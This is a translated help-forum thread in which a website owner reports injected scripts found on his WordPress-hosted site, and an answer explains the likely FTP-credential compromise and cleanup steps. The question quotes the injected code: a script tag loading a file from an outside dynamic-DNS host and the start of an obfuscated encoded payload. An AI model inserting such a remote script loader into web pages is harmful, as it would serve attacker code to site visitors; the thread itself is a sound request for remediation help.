Google Chrome 向我展示了恶意代码检测。我能够在源代码(firebug)中追踪到代码,但我不知道如何找到代码所在的 .js 脚本。它由 2 个脚本组成:
<script src="http://12nwsp.serveirc.com//ml.php" type="text/javascript"> </script>
<script type="text/javascript">var bWUW1aIO9J="YEXI018YEXI035";var fGdfWY1etv0="YEXI03cYEXI073YEXI063YEXI07";
其中还有更多变量。
这些 javascript 位于页面底部,结束</html>
标签之后。
有趣的是...一旦我在我的主机上创建了另一个子域名,并且安装了 Wordpress 并做了一些事情,完全相同的 12nwsp.serveirc.com 又回来了。
现在我搜索了又搜索,得出的结论是它很可能是由 iframe 创建的(而且我确实有它们)。
如果你想看看并帮助我,那就http://test.donm.nl/vanderwal (它是一种在线目录)。
我只是想知道是否有任何工具或东西可以告诉我那些烦人的脚本位于何处,以便我可以删除它们。
泰
答案1
您被黑客入侵了。可能是由于 FTP 帐户被盗用:您在用于上传网站的客户端计算机上感染了木马,它会窃取您的密码,然后自动攻击会登录并向您的所有 HTML 文件添加脚本。
您可以使用普通的旧式文件查找工具来定位这些<script>
块,但仅仅删除脚本本身并没有什么用。您只会再次受到攻击。
还有其他可能性,比如不安全的服务器端应用程序与较差的权限设置相结合,或者更广泛的服务器级入侵——尽管该服务器上的其他站点似乎没有受到感染。FTP 帐户入侵是目前最常见的媒介。
您应该将您的网站脱机,使用多个检查器扫描您用于访问 FTP 的每台机器。不要只信任一个 AV:当今的防病毒工具无法跟上攻击的广度。同样,如果您受到攻击,它们也不能保证删除所有内容,因此如果您发现任何东西,或者该机器过去曾感染过任何木马,您需要将其清除并重新安装操作系统。(然后确保您的浏览器和任何插件都是最新的,并删除您不需要的插件,以避免将来感染。)
然后您可以更改 FTP 密码,删除脚本并让网站重新上线。(以后可以使用 SFTP。)